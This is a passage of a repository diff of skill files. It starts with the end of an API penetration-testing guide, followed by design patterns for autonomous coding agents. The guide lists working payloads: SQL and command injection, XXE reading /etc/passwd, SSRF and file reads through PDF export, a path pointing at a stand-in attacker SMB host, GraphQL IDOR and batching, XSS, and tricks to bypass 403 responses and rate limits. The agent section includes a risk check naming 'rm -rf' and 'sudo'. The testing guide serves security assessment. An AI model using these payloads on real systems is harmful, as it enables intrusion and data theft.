**SQL Injection in JSON:**

```
{"id":"56456"}                → OK
{"id":"56456 AND 1=1#"}       → OK
{"id":"56456 AND 1=2#"}       → OK
{"id":"56456 AND 1=3#"}       → ERROR (vulnerable!)
{"id":"56456 AND sleep(15)#"} → SLEEP 15 SEC
```

**Command Injection:**

```bash
# Ruby on Rails
?url=Kernel#open → ?url=|ls

# Linux command injection
api.url.com/endpoint?name=file.txt;ls%20/
```

**XXE Injection:**

```xml
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
```

**SSRF via API:**

```html
<object data="http://127.0.0.1:8443"/>
<img src="http://127.0.0.1:445"/>
```

**.NET Path.Combine Vulnerability:**

```bash
# If a .NET app uses Path.Combine(path_1, path_2),
# test for path traversal
https://example.org/download?filename=a.png
https://example.org/download?filename=C:\inetpub\wwwroot\web.config
https://example.org/download?filename=\\smb.dns.attacker.com\a.png
```
### Step 5: Method Testing

```bash
# Test all HTTP methods
GET    /api/v1/users/1
POST   /api/v1/users/1
PUT    /api/v1/users/1
DELETE /api/v1/users/1
PATCH  /api/v1/users/1

# Switch content type
Content-Type: application/json → application/xml
```

---
## GraphQL-Specific Testing

### Introspection Query

Fetch the entire backend schema:

```graphql
{__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,args{name,type{name,kind}}}}}}
```

**URL-encoded version:**

```
/graphql?query={__schema{types{name,kind,description,fields{name}}}}
```

### GraphQL IDOR

```graphql
# Try accessing other user IDs
query {
  user(id: "OTHER_USER_ID") {
    email
    password
    creditCard
  }
}
```

### GraphQL SQL/NoSQL Injection

```graphql
mutation {
  login(input: {
    email: "test' or 1=1--"
    password: "password"
  }) {
    success
    jwt
  }
}
```

### Rate Limit Bypass (Batching)

```graphql
mutation {login(input:{email:"a@example.com" password:"password"}){success jwt}}
mutation {login(input:{email:"b@example.com" password:"password"}){success jwt}}
mutation {login(input:{email:"c@example.com" password:"password"}){success jwt}}
```

### GraphQL DoS (Nested Queries)

```graphql
query {
  posts {
    comments {
      user {
        posts {
          comments {
            user {
              posts { ... }
            }
          }
        }
      }
    }
  }
}
```

### GraphQL XSS

```bash
# XSS via GraphQL endpoint
http://target.com/graphql?query={user(name:"<script>alert(1)</script>"){id}}

# URL-encoded XSS
http://target.com/example?id=%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E
```
### GraphQL Tools

| Tool | Purpose |
|------|---------|
| GraphCrawler | Schema discovery |
| graphw00f | Fingerprinting |
| clairvoyance | Schema reconstruction |
| InQL | Burp extension |
| GraphQLmap | Exploitation |

---

## Endpoint Bypass Techniques

When receiving a 403/401, try these bypasses:

```bash
# Original blocked request
/api/v1/users/sensitivedata → 403

# Bypass attempts
/api/v1/users/sensitivedata.json
/api/v1/users/sensitivedata?
/api/v1/users/sensitivedata/
/api/v1/users/sensitivedata??
/api/v1/users/sensitivedata%20
/api/v1/users/sensitivedata%09
/api/v1/users/sensitivedata#
/api/v1/users/sensitivedata&details
/api/v1/users/..;/sensitivedata
```
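These variants are easy to generate for a whole endpoint list; a small sketch (the suffix set mirrors the list above, the function name is ours):

```python
# Generate common 403/401 endpoint-bypass variants of a blocked path.
def bypass_candidates(path):
    suffixes = [".json", "?", "/", "??", "%20", "%09", "#", "&details"]
    variants = [path + s for s in suffixes]
    # path-segment trick: /a/b -> /a/..;/b
    head, _, tail = path.rpartition("/")
    variants.append(f"{head}/..;/{tail}")
    return variants
```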
---

## Output Exploitation

### PDF Export Attacks

```html
<!-- LFI via PDF export -->
<iframe src="file:///etc/passwd" height=1000 width=800>

<!-- SSRF via PDF export -->
<object data="http://127.0.0.1:8443"/>

<!-- Port scanning -->
<img src="http://127.0.0.1:445"/>

<!-- IP disclosure -->
<img src="https://iplogger.com/yourcode.gif"/>
```

### DoS via Limits

```bash
# Normal request
/api/news?limit=100

# DoS attempt
/api/news?limit=9999999999
```
---

## Common API Vulnerabilities Checklist

| Vulnerability | Description |
|---------------|-------------|
| API Exposure | Unprotected endpoints exposed publicly |
| Misconfigured Caching | Sensitive data cached incorrectly |
| Exposed Tokens | API keys/tokens in responses or URLs |
| JWT Weaknesses | Weak signing, no expiration, algorithm confusion |
| IDOR / BOLA | Broken Object Level Authorization |
| Undocumented Endpoints | Hidden admin/debug endpoints |
| Different Versions | Security gaps in older API versions |
| Rate Limiting | Missing or bypassable rate limits |
| Race Conditions | TOCTOU vulnerabilities |
| XXE Injection | XML parser exploitation |
| Content Type Issues | Switching between JSON/XML |
| HTTP Method Tampering | GET→DELETE/PUT abuse |

---

## Quick Reference

| Vulnerability | Test Payload | Risk |
|---------------|--------------|------|
| IDOR | Change user_id parameter | High |
| SQLi | `' OR 1=1--` in JSON | Critical |
| Command Injection | `; ls /` | Critical |
| XXE | DOCTYPE with ENTITY | High |
| SSRF | Internal IP in params | High |
| Rate Limit Bypass | Batch requests | Medium |
| Method Tampering | GET→DELETE | High |
---

## Tools Reference

| Category | Tool | URL |
|----------|------|-----|
| API Fuzzing | Fuzzapi | github.com/Fuzzapi/fuzzapi |
| API Fuzzing | API-fuzzer | github.com/Fuzzapi/API-fuzzer |
| API Fuzzing | Astra | github.com/flipkart-incubator/Astra |
| API Security | apicheck | github.com/BBVA/apicheck |
| API Discovery | Kiterunner | github.com/assetnote/kiterunner |
| API Discovery | openapi_security_scanner | github.com/ngalongc/openapi_security_scanner |
| API Toolkit | APIKit | github.com/API-Security/APIKit |
| API Keys | API Guesser | api-guesser.netlify.app |
| GUID | GUID Guesser | gist.github.com/DanaEpp/8c6803e542f094da5c4079622f9b4d18 |
| GraphQL | InQL | github.com/doyensec/inql |
| GraphQL | GraphCrawler | github.com/gsmith257-cyber/GraphCrawler |
| GraphQL | graphw00f | github.com/dolevf/graphw00f |
| GraphQL | clairvoyance | github.com/nikitastupin/clairvoyance |
| GraphQL | batchql | github.com/assetnote/batchql |
| GraphQL | graphql-cop | github.com/dolevf/graphql-cop |
| Wordlists | SecLists | github.com/danielmiessler/SecLists |
| Swagger Parser | Swagger-EZ | rhinosecuritylabs.github.io/Swagger-EZ |
| Swagger Routes | swagroutes | github.com/amalmurali47/swagroutes |
| API Mindmap | MindAPI | dsopas.github.io/MindAPI/play |
| JSON Paths | json2paths | github.com/s0md3v/dump/tree/master/json2paths |
---
## Constraints

**Must:**

- Test mobile, web, and developer APIs separately
- Check all API versions (/v1, /v2, /v3)
- Validate both authenticated and unauthenticated access

**Must Not:**

- Assume the same security controls across API versions
- Skip testing undocumented endpoints
- Ignore rate limiting checks

**Should:**

- Add `X-Requested-With: XMLHttpRequest` header to simulate the frontend
- Check archive.org for historical API endpoints
- Test for race conditions on sensitive operations
---

## Examples

### Example 1: IDOR Exploitation

```bash
# Original request (own data)
GET /api/v1/invoices/12345
Authorization: Bearer <token>

# Modified request (other user's data)
GET /api/v1/invoices/12346
Authorization: Bearer <token>

# Response reveals the other user's invoice data
```

### Example 2: GraphQL Introspection

```bash
curl -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{__schema{types{name,fields{name}}}}"}'
```

---

## Troubleshooting

| Issue | Solution |
|-------|----------|
| API returns nothing | Add `X-Requested-With: XMLHttpRequest` header |
| 401 on all endpoints | Try adding `?user_id=1` parameter |
| GraphQL introspection disabled | Use clairvoyance for schema reconstruction |
| Rate limited | Use IP rotation or batch requests |
| Can't find endpoints | Check Swagger, archive.org, JS files |
761
skills/autonomous-agent-patterns/SKILL.md
Normal file
@@ -0,0 +1,761 @@
---
name: autonomous-agent-patterns
description: "Design patterns for building autonomous coding agents. Covers tool integration, permission systems, browser automation, and human-in-the-loop workflows. Use when building AI agents, designing tool APIs, implementing permission systems, or creating autonomous coding assistants."
---

# 🕹️ Autonomous Agent Patterns

> Design patterns for building autonomous coding agents, inspired by [Cline](https://github.com/cline/cline) and [OpenAI Codex](https://github.com/openai/codex).

## When to Use This Skill

Use this skill when:

- Building autonomous AI agents
- Designing tool/function calling APIs
- Implementing permission and approval systems
- Creating browser automation for agents
- Designing human-in-the-loop workflows

---
## 1. Core Agent Architecture

### 1.1 Agent Loop

```
┌─────────────────────────────────────────────────────────────┐
│                         AGENT LOOP                          │
│                                                             │
│   ┌──────────┐      ┌──────────┐      ┌──────────┐          │
│   │  Think   │─────▶│  Decide  │─────▶│   Act    │          │
│   │ (Reason) │      │  (Plan)  │      │ (Execute)│          │
│   └──────────┘      └──────────┘      └──────────┘          │
│        ▲                                   │                │
│        │            ┌──────────┐           │                │
│        └────────────│ Observe  │◀──────────┘                │
│                     │ (Result) │                            │
│                     └──────────┘                            │
└─────────────────────────────────────────────────────────────┘
```

```python
import json
from typing import Any


class AgentLoop:
    def __init__(self, llm, tools, max_iterations=50):
        self.llm = llm
        self.tools = {t.name: t for t in tools}
        self.max_iterations = max_iterations
        self.history = []

    def run(self, task: str) -> str:
        self.history.append({"role": "user", "content": task})

        for i in range(self.max_iterations):
            # Think: Get LLM response with tool options
            response = self.llm.chat(
                messages=self.history,
                tools=self._format_tools(),
                tool_choice="auto"
            )

            # Decide: Check if agent wants to use a tool
            if response.tool_calls:
                for tool_call in response.tool_calls:
                    # Act: Execute the tool
                    result = self._execute_tool(tool_call)

                    # Observe: Add result to history
                    self.history.append({
                        "role": "tool",
                        "tool_call_id": tool_call.id,
                        "content": str(result)
                    })
            else:
                # No more tool calls = task complete
                return response.content

        return "Max iterations reached"

    def _execute_tool(self, tool_call) -> Any:
        tool = self.tools[tool_call.name]
        args = json.loads(tool_call.arguments)
        return tool.execute(**args)
```
### 1.2 Multi-Model Architecture

```python
class MultiModelAgent:
    """
    Use different models for different purposes:
    - Fast model for planning
    - Powerful model for complex reasoning
    - Specialized model for code generation
    """

    def __init__(self):
        self.models = {
            "fast": "gpt-3.5-turbo",    # Quick decisions
            "smart": "gpt-4-turbo",     # Complex reasoning
            "code": "claude-3-sonnet",  # Code generation
        }

    def select_model(self, task_type: str) -> str:
        if task_type == "planning":
            return self.models["fast"]
        elif task_type == "analysis":
            return self.models["smart"]
        elif task_type == "code":
            return self.models["code"]
        return self.models["smart"]
```
---

## 2. Tool Design Patterns

### 2.1 Tool Schema

```python
class Tool:
    """Base class for agent tools"""

    @property
    def schema(self) -> dict:
        """JSON Schema for the tool"""
        return {
            "name": self.name,
            "description": self.description,
            "parameters": {
                "type": "object",
                "properties": self._get_parameters(),
                "required": self._get_required()
            }
        }

    def execute(self, **kwargs) -> ToolResult:
        """Execute the tool and return result"""
        raise NotImplementedError


class ReadFileTool(Tool):
    name = "read_file"
    description = "Read the contents of a file from the filesystem"

    def _get_parameters(self):
        return {
            "path": {
                "type": "string",
                "description": "Absolute path to the file"
            },
            "start_line": {
                "type": "integer",
                "description": "Line to start reading from (1-indexed)"
            },
            "end_line": {
                "type": "integer",
                "description": "Line to stop reading at (inclusive)"
            }
        }

    def _get_required(self):
        return ["path"]

    def execute(self, path: str, start_line: int = None, end_line: int = None) -> ToolResult:
        try:
            with open(path, 'r') as f:
                lines = f.readlines()

            if start_line and end_line:
                lines = lines[start_line-1:end_line]

            return ToolResult(
                success=True,
                output="".join(lines)
            )
        except FileNotFoundError:
            return ToolResult(
                success=False,
                error=f"File not found: {path}"
            )
```
|
||||
|
||||
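The snippets in this document return a `ToolResult` that is never defined. A minimal assumed shape (the field names are inferred from how the snippets use it, not a documented API):

```python
from dataclasses import dataclass, field
from typing import Optional

@dataclass
class ToolResult:
    """Uniform envelope for tool outcomes: success flag, output, error, extras."""
    success: bool
    output: str = ""
    error: Optional[str] = None
    metadata: dict = field(default_factory=dict)

ok = ToolResult(success=True, output="file contents")
fail = ToolResult(success=False, error="File not found: /tmp/x")
```

A dataclass keeps the envelope cheap to construct while letting callers branch on `success` instead of catching exceptions.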
### 2.2 Essential Agent Tools

```python
CODING_AGENT_TOOLS = {
    # File operations
    "read_file": "Read file contents",
    "write_file": "Create or overwrite a file",
    "edit_file": "Make targeted edits to a file",
    "list_directory": "List files and folders",
    "search_files": "Search for files by pattern",

    # Code understanding
    "search_code": "Search for code patterns (grep)",
    "get_definition": "Find function/class definition",
    "get_references": "Find all references to a symbol",

    # Terminal
    "run_command": "Execute a shell command",
    "read_output": "Read command output",
    "send_input": "Send input to running command",

    # Browser (optional)
    "open_browser": "Open URL in browser",
    "click_element": "Click on page element",
    "type_text": "Type text into input",
    "screenshot": "Capture screenshot",

    # Context
    "ask_user": "Ask the user a question",
    "search_web": "Search the web for information"
}
```
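Section 1's loop calls `self._format_tools()`, which is never shown. A plausible sketch that turns registered tools into the schema list an OpenAI-style chat API expects (the wrapper shape is an assumption based on common function-calling formats):

```python
def format_tools(tools: dict) -> list:
    """Convert a {name: Tool} registry into a list of function-call schemas."""
    return [
        {"type": "function", "function": tool.schema}
        for tool in tools.values()
    ]

class StubTool:
    """Minimal stand-in matching the Tool.schema property from section 2.1."""
    name = "read_file"
    description = "Read a file"

    @property
    def schema(self):
        return {
            "name": self.name,
            "description": self.description,
            "parameters": {"type": "object", "properties": {}, "required": []},
        }

formatted = format_tools({"read_file": StubTool()})
```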
### 2.3 Edit Tool Design

```python
class EditFileTool(Tool):
    """
    Precise file editing with conflict detection.
    Uses a search/replace pattern for reliable edits.
    """

    name = "edit_file"
    description = "Edit a file by replacing specific content"

    def execute(
        self,
        path: str,
        search: str,
        replace: str,
        expected_occurrences: int = 1
    ) -> ToolResult:
        """
        Args:
            path: File to edit
            search: Exact text to find (must match exactly, including whitespace)
            replace: Text to replace with
            expected_occurrences: How many times search should appear (validation)
        """
        with open(path, 'r') as f:
            content = f.read()

        # Validate: check the not-found case first so the occurrence-count
        # check below can never mask it
        actual_occurrences = content.count(search)
        if actual_occurrences == 0:
            return ToolResult(
                success=False,
                error="Search text not found in file"
            )

        if actual_occurrences != expected_occurrences:
            return ToolResult(
                success=False,
                error=f"Expected {expected_occurrences} occurrences, found {actual_occurrences}"
            )

        # Apply edit
        new_content = content.replace(search, replace)

        with open(path, 'w') as f:
            f.write(new_content)

        return ToolResult(
            success=True,
            output=f"Replaced {actual_occurrences} occurrence(s)"
        )
```
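The validation logic above can be exercised without touching disk. A stripped-down version of the same search/replace rule (a sketch for illustration, returning `(new_content, error)` instead of a `ToolResult`):

```python
def apply_edit(content: str, search: str, replace: str, expected: int = 1):
    """Apply a validated search/replace; return (new_content, error)."""
    found = content.count(search)
    if found == 0:
        return None, "Search text not found"
    if found != expected:
        return None, f"Expected {expected} occurrences, found {found}"
    return content.replace(search, replace), None

new, err = apply_edit("a = 1\nb = 1\n", "a = 1", "a = 2")
bad, err2 = apply_edit("x\nx\n", "x", "y", expected=1)  # ambiguous: 2 matches
```

The `expected` count is the key safety feature: it forces the caller to be explicit when a search string is ambiguous.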
---
## 3. Permission & Safety Patterns

### 3.1 Permission Levels

```python
from enum import Enum

class PermissionLevel(Enum):
    # Fully automatic - no user approval needed
    AUTO = "auto"

    # Ask once per session
    ASK_ONCE = "ask_once"

    # Ask every time
    ASK_EACH = "ask_each"

    # Never allow
    NEVER = "never"

PERMISSION_CONFIG = {
    # Low risk - can auto-approve
    "read_file": PermissionLevel.AUTO,
    "list_directory": PermissionLevel.AUTO,
    "search_code": PermissionLevel.AUTO,

    # Medium risk - ask once
    "write_file": PermissionLevel.ASK_ONCE,
    "edit_file": PermissionLevel.ASK_ONCE,

    # High risk - ask each time
    "run_command": PermissionLevel.ASK_EACH,
    "delete_file": PermissionLevel.ASK_EACH,

    # Dangerous - never auto-approve
    "sudo_command": PermissionLevel.NEVER,
    "format_disk": PermissionLevel.NEVER
}
```
### 3.2 Approval UI Pattern

```python
class ApprovalManager:
    def __init__(self, ui, config):
        self.ui = ui
        self.config = config
        self.session_approvals = {}

    def request_approval(self, tool_name: str, args: dict) -> bool:
        level = self.config.get(tool_name, PermissionLevel.ASK_EACH)

        if level == PermissionLevel.AUTO:
            return True

        if level == PermissionLevel.NEVER:
            self.ui.show_error(f"Tool '{tool_name}' is not allowed")
            return False

        if level == PermissionLevel.ASK_ONCE:
            if tool_name in self.session_approvals:
                return self.session_approvals[tool_name]

        # Show approval dialog
        approved = self.ui.show_approval_dialog(
            tool=tool_name,
            args=args,
            risk_level=self._assess_risk(tool_name, args)
        )

        if level == PermissionLevel.ASK_ONCE:
            self.session_approvals[tool_name] = approved

        return approved

    def _assess_risk(self, tool_name: str, args: dict) -> str:
        """Analyze a specific call for its risk level"""
        if tool_name == "run_command":
            cmd = args.get("command", "")
            if any(danger in cmd for danger in ["rm -rf", "sudo", "chmod"]):
                return "HIGH"
            return "MEDIUM"
        return "LOW"  # default for tools without special handling
```
### 3.3 Sandboxing

```python
import os
import shlex
import subprocess

class SandboxedExecution:
    """
    Execute code/commands in an isolated environment
    """

    def __init__(self, workspace_dir: str):
        self.workspace = workspace_dir
        self.allowed_commands = ["npm", "python", "node", "git", "ls", "cat"]
        self.blocked_paths = ["/etc", "/usr", "/bin", os.path.expanduser("~")]

    def validate_path(self, path: str) -> bool:
        """Ensure the path is within the workspace"""
        real_path = os.path.realpath(path)
        workspace_real = os.path.realpath(self.workspace)
        # Compare whole path components; a bare startswith() would also
        # accept siblings like /workspace-evil for workspace /workspace
        return os.path.commonpath([real_path, workspace_real]) == workspace_real

    def validate_command(self, command: str) -> bool:
        """Check if the command is allowed"""
        cmd_parts = shlex.split(command)
        if not cmd_parts:
            return False

        base_cmd = cmd_parts[0]
        return base_cmd in self.allowed_commands

    def execute_sandboxed(self, command: str) -> ToolResult:
        if not self.validate_command(command):
            return ToolResult(
                success=False,
                error=f"Command not allowed: {command}"
            )

        # Execute without a shell so `;`, `&&`, and $() can't smuggle in
        # commands that bypass validate_command
        result = subprocess.run(
            shlex.split(command),
            cwd=self.workspace,
            capture_output=True,
            timeout=30,
            env={
                **os.environ,
                "HOME": self.workspace,  # Isolate home directory
            }
        )

        return ToolResult(
            success=result.returncode == 0,
            output=result.stdout.decode(),
            error=result.stderr.decode() if result.returncode != 0 else None
        )
```
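Path containment is easy to get wrong: a naive `startswith` check accepts sibling directories like `/workspace-evil`, and symlinks or `..` segments can escape the workspace entirely. A component-wise check avoids both:

```python
import os

def is_within(path: str, workspace: str) -> bool:
    """True only if path resolves to a location inside workspace."""
    real = os.path.realpath(path)        # resolves symlinks and ".." segments
    root = os.path.realpath(workspace)
    return os.path.commonpath([real, root]) == root

inside = is_within("/workspace/src/app.py", "/workspace")      # contained
sibling = is_within("/workspace-evil/x", "/workspace")         # prefix trap
escape = is_within("/workspace/../etc/passwd", "/workspace")   # ".." escape
```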
---
## 4. Browser Automation

### 4.1 Browser Tool Pattern

```python
import base64

class BrowserTool:
    """
    Browser automation for agents using Playwright/Puppeteer.
    Enables visual debugging and web testing.
    (Assumes a started Playwright instance is available as `playwright`.)
    """

    def __init__(self, headless: bool = True):
        self.browser = None
        self.page = None
        self.headless = headless

    async def open_url(self, url: str) -> ToolResult:
        """Navigate to a URL and return page info"""
        if not self.browser:
            self.browser = await playwright.chromium.launch(headless=self.headless)
            self.page = await self.browser.new_page()

        await self.page.goto(url)

        # Capture state
        screenshot = await self.page.screenshot(type='png')
        title = await self.page.title()

        return ToolResult(
            success=True,
            output=f"Loaded: {title}",
            metadata={
                "screenshot": base64.b64encode(screenshot).decode(),
                "url": self.page.url
            }
        )

    async def click(self, selector: str) -> ToolResult:
        """Click on an element"""
        try:
            await self.page.click(selector, timeout=5000)
            await self.page.wait_for_load_state("networkidle")

            screenshot = await self.page.screenshot()
            return ToolResult(
                success=True,
                output=f"Clicked: {selector}",
                metadata={"screenshot": base64.b64encode(screenshot).decode()}
            )
        except TimeoutError:
            return ToolResult(
                success=False,
                error=f"Element not found: {selector}"
            )

    async def type_text(self, selector: str, text: str) -> ToolResult:
        """Type text into an input"""
        await self.page.fill(selector, text)
        return ToolResult(success=True, output=f"Typed into {selector}")

    async def get_page_content(self) -> ToolResult:
        """Get the accessible text content of the page"""
        content = await self.page.evaluate("""
            () => {
                // Get visible text
                const walker = document.createTreeWalker(
                    document.body,
                    NodeFilter.SHOW_TEXT,
                    null,
                    false
                );

                let text = '';
                while (walker.nextNode()) {
                    const node = walker.currentNode;
                    if (node.textContent.trim()) {
                        text += node.textContent.trim() + '\\n';
                    }
                }
                return text;
            }
        """)
        return ToolResult(success=True, output=content)
```
### 4.2 Visual Agent Pattern

```python
class VisualAgent:
    """
    Agent that uses screenshots to understand web pages.
    Can identify elements visually without selectors.
    """

    def __init__(self, llm, browser):
        self.llm = llm
        self.browser = browser

    async def describe_page(self) -> str:
        """Use a vision model to describe the current page"""
        screenshot = await self.browser.screenshot()

        response = self.llm.chat([
            {
                "role": "user",
                "content": [
                    {"type": "text", "text": "Describe this webpage. List all interactive elements you see."},
                    {"type": "image", "data": screenshot}
                ]
            }
        ])

        return response.content

    async def find_and_click(self, description: str) -> ToolResult:
        """Find an element by visual description and click it"""
        screenshot = await self.browser.screenshot()

        # Ask the vision model to locate the element
        response = self.llm.chat([
            {
                "role": "user",
                "content": [
                    {
                        "type": "text",
                        "text": f"""
                        Find the element matching: "{description}"
                        Return the approximate coordinates as JSON: {{"x": number, "y": number}}
                        """
                    },
                    {"type": "image", "data": screenshot}
                ]
            }
        ])

        coords = json.loads(response.content)
        await self.browser.page.mouse.click(coords["x"], coords["y"])

        return ToolResult(success=True, output=f"Clicked at ({coords['x']}, {coords['y']})")
```
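`json.loads(response.content)` assumes the model returns bare JSON; real models often wrap it in prose or code fences. A tolerant extraction helper (a sketch, not part of any library):

```python
import json
import re

def extract_json(text: str) -> dict:
    """Pull the first {...} object out of free-form model output."""
    match = re.search(r"\{.*\}", text, re.DOTALL)
    if not match:
        raise ValueError("No JSON object found in model output")
    return json.loads(match.group(0))

coords = extract_json('Sure! Here you go: {"x": 120, "y": 48}')
```

Combined with a retry on `ValueError`, this absorbs most formatting drift without constraining the model's output mode.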
---
## 5. Context Management

### 5.1 Context Injection Patterns

````python
class ContextManager:
    """
    Manage context provided to the agent.
    Inspired by Cline's @-mention patterns.
    """

    def __init__(self, workspace: str):
        self.workspace = workspace
        self.context = []

    def add_file(self, path: str) -> None:
        """@file - Add file contents to context"""
        with open(path, 'r') as f:
            content = f.read()

        self.context.append({
            "type": "file",
            "path": path,
            "content": content
        })

    def add_folder(self, path: str, max_files: int = 20) -> None:
        """@folder - Add files in a folder, up to max_files in total"""
        added = 0
        for root, dirs, files in os.walk(path):
            for file in files:
                if added >= max_files:  # cap the total, not per-directory
                    return
                self.add_file(os.path.join(root, file))
                added += 1

    def add_url(self, url: str) -> None:
        """@url - Fetch and add URL content"""
        response = requests.get(url)
        content = html_to_markdown(response.text)

        self.context.append({
            "type": "url",
            "url": url,
            "content": content
        })

    def add_problems(self, diagnostics: list) -> None:
        """@problems - Add IDE diagnostics"""
        self.context.append({
            "type": "diagnostics",
            "problems": diagnostics
        })

    def format_for_prompt(self) -> str:
        """Format all context for the LLM prompt"""
        parts = []
        for item in self.context:
            if item["type"] == "file":
                parts.append(f"## File: {item['path']}\n```\n{item['content']}\n```")
            elif item["type"] == "url":
                parts.append(f"## URL: {item['url']}\n{item['content']}")
            elif item["type"] == "diagnostics":
                parts.append(f"## Problems:\n{json.dumps(item['problems'], indent=2)}")

        return "\n\n".join(parts)
````
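Injected context grows without bound as items are added. A simple guard that keeps only the most recent items once the formatted prompt would exceed a character budget (the newest-first policy is an assumption; real systems often rank by relevance instead):

```python
def trim_to_budget(items: list, budget_chars: int) -> list:
    """Keep the most recent context items whose combined size fits the budget."""
    kept = []
    total = 0
    for item in reversed(items):          # newest items first
        size = len(item["content"])
        if total + size > budget_chars:
            break
        kept.append(item)
        total += size
    return list(reversed(kept))           # restore original order

items = [
    {"type": "file", "content": "a" * 50},
    {"type": "file", "content": "b" * 30},
    {"type": "url", "content": "c" * 30},
]
trimmed = trim_to_budget(items, budget_chars=70)  # drops the oldest 50-char file
```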
### 5.2 Checkpoint/Resume

```python
class CheckpointManager:
    """
    Save and restore agent state for long-running tasks.
    """

    def __init__(self, storage_dir: str):
        self.storage_dir = storage_dir
        os.makedirs(storage_dir, exist_ok=True)

    def save_checkpoint(self, session_id: str, state: dict) -> str:
        """Save the current agent state"""
        checkpoint = {
            "timestamp": datetime.now().isoformat(),
            "session_id": session_id,
            "history": state["history"],
            "context": state["context"],
            "workspace_state": self._capture_workspace(state["workspace"]),
            "metadata": state.get("metadata", {})
        }

        path = os.path.join(self.storage_dir, f"{session_id}.json")
        with open(path, 'w') as f:
            json.dump(checkpoint, f, indent=2)

        return path

    def restore_checkpoint(self, checkpoint_path: str) -> dict:
        """Restore agent state from a checkpoint"""
        with open(checkpoint_path, 'r') as f:
            checkpoint = json.load(f)

        return {
            "history": checkpoint["history"],
            "context": checkpoint["context"],
            "workspace": self._restore_workspace(checkpoint["workspace_state"]),
            "metadata": checkpoint["metadata"]
        }

    def _capture_workspace(self, workspace: str) -> dict:
        """Capture relevant workspace state"""
        # Git status, file hashes, etc.
        return {
            "git_ref": subprocess.getoutput(f"cd {workspace} && git rev-parse HEAD"),
            "git_dirty": subprocess.getoutput(f"cd {workspace} && git status --porcelain")
        }
```

---
## 6. MCP (Model Context Protocol) Integration

### 6.1 MCP Server Pattern

```python
from mcp import Server, Tool

class MCPAgent:
    """
    Agent that can dynamically discover and use MCP tools.
    'Add a tool that...' pattern from Cline.
    """

    def __init__(self, llm):
        self.llm = llm
        self.mcp_servers = {}
        self.available_tools = {}

    def connect_server(self, name: str, config: dict) -> None:
        """Connect to an MCP server"""
        server = Server(config)
        self.mcp_servers[name] = server

        # Discover tools
        tools = server.list_tools()
        for tool in tools:
            self.available_tools[tool.name] = {
                "server": name,
                "schema": tool.schema
            }

    async def create_tool(self, description: str) -> str:
        """
        Create a new MCP server based on a user description.
        'Add a tool that fetches Jira tickets'
        """
        # Generate MCP server code
        code = self.llm.generate(f"""
        Create a Python MCP server with a tool that does:
        {description}

        Use the FastMCP framework. Include proper error handling.
        Return only the Python code.
        """)

        # Save and install
        server_name = self._extract_name(description)
        path = f"./mcp_servers/{server_name}/server.py"
        os.makedirs(os.path.dirname(path), exist_ok=True)

        with open(path, 'w') as f:
            f.write(code)

        # Hot-reload
        self.connect_server(server_name, {"path": path})

        return f"Created tool: {server_name}"
```

---
## Best Practices Checklist

### Agent Design

- [ ] Clear task decomposition
- [ ] Appropriate tool granularity
- [ ] Error handling at each step
- [ ] Progress visibility to the user

### Safety

- [ ] Permission system implemented
- [ ] Dangerous operations blocked
- [ ] Sandbox for untrusted code
- [ ] Audit logging enabled

### UX

- [ ] Approval UI is clear
- [ ] Progress updates provided
- [ ] Undo/rollback available
- [ ] Explanation of actions

---
## Resources

- [Cline](https://github.com/cline/cline)
- [OpenAI Codex](https://github.com/openai/codex)
- [Model Context Protocol](https://modelcontextprotocol.io/)
- [Anthropic Tool Use](https://docs.anthropic.com/claude/docs/tool-use)
---

**File: `skills/autonomous-agents/SKILL.md`** (new file, 68 lines)
---
name: autonomous-agents
description: "Autonomous agents are AI systems that can independently decompose goals, plan actions, execute tools, and self-correct without constant human guidance. The challenge isn't making them capable - it's making them reliable. Every extra decision multiplies failure probability. This skill covers agent loops (ReAct, Plan-Execute), goal decomposition, reflection patterns, and production reliability. Key insight: compounding error rates kill autonomous agents. A 95% success rate per step drops to 60% by step 10."
source: vibeship-spawner-skills (Apache 2.0)
---

# Autonomous Agents

You are an agent architect who has learned the hard lessons of autonomous AI.
You've seen the gap between impressive demos and production disasters. You know
that a 95% success rate per step means only 60% by step 10.
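The compounding arithmetic is worth making concrete:

```python
# Probability that every step of an n-step run succeeds, at 95% per step
per_step = 0.95
for steps in (1, 5, 10, 20):
    print(steps, round(per_step ** steps, 2))
# At 10 steps, 0.95**10 ≈ 0.60: only ~60% of runs finish cleanly,
# and at 20 steps reliability collapses to roughly one run in three.
```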
Your core insight: Autonomy is earned, not granted. Start with heavily
constrained agents that do one thing reliably. Add autonomy only as you prove
reliability. The best agents look less impressive but work consistently.

You push for guardrails before capabilities, and logging before autonomy.
## Capabilities

- autonomous-agents
- agent-loops
- goal-decomposition
- self-correction
- reflection-patterns
- react-pattern
- plan-execute
- agent-reliability
- agent-guardrails

## Patterns

### ReAct Agent Loop

Alternating reasoning and action steps

### Plan-Execute Pattern

Separate planning phase from execution

### Reflection Pattern

Self-evaluation and iterative improvement
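The reflection pattern above has a minimal shape: generate, critique, revise until the critic is satisfied. A sketch (the names and two-step stub are illustrative, not a prescribed API):

```python
def reflect_loop(generate, critique, max_rounds=3):
    """Generate a draft, then revise while the critic still finds problems."""
    draft = generate(None)
    for _ in range(max_rounds):
        feedback = critique(draft)
        if not feedback:            # critic is satisfied
            return draft
        draft = generate(feedback)  # revise using the critique
    return draft                    # give up after max_rounds

# Stub: the first draft fails the check, the revision passes.
gen = lambda fb: "draft v2" if fb else "draft v1"
crit = lambda d: "missing tests" if d == "draft v1" else None
result = reflect_loop(gen, crit)
```

The `max_rounds` cap matters: without it, a critic that is never satisfied turns reflection into an unbounded loop, the same compounding-cost trap the rest of this skill warns about.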
## Anti-Patterns

### ❌ Unbounded Autonomy

### ❌ Trusting Agent Outputs

### ❌ General-Purpose Autonomy
## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | critical | Reduce step count |
| Issue | critical | Set hard cost limits |
| Issue | critical | Test at scale before production |
| Issue | high | Validate against ground truth |
| Issue | high | Build robust API clients |
| Issue | high | Least privilege principle |
| Issue | medium | Track context usage |
| Issue | medium | Structured logging |

## Related Skills

Works well with: `agent-tool-builder`, `agent-memory-systems`, `multi-agent-orchestration`, `agent-evaluation`
---

**File: `skills/aws-serverless/SKILL.md`** (new file, 323 lines)
---
name: aws-serverless
